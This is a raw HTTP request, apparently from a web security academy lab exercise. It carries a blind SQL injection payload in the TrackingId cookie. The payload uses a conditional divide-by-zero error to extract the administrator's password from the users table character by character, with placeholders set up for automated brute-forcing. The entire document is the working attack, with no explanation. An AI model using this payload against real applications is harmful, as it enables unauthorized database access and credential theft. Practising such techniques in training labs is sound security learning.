GET /filter?category=Gifts HTTP/2
Host: 0a9f00cb037511c580af085d002900bd.web-security-academy.net
Cookie: TrackingId=C45KfPMrhWE9vFdw'||(SELECT CASE WHEN SUBSTR(password,$pos$,1)$op$'$char$' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=eh4fGSgCUztMSFgrXCbW46Ws5UvgRW1g
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9f00cb037511c580af085d002900bd.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

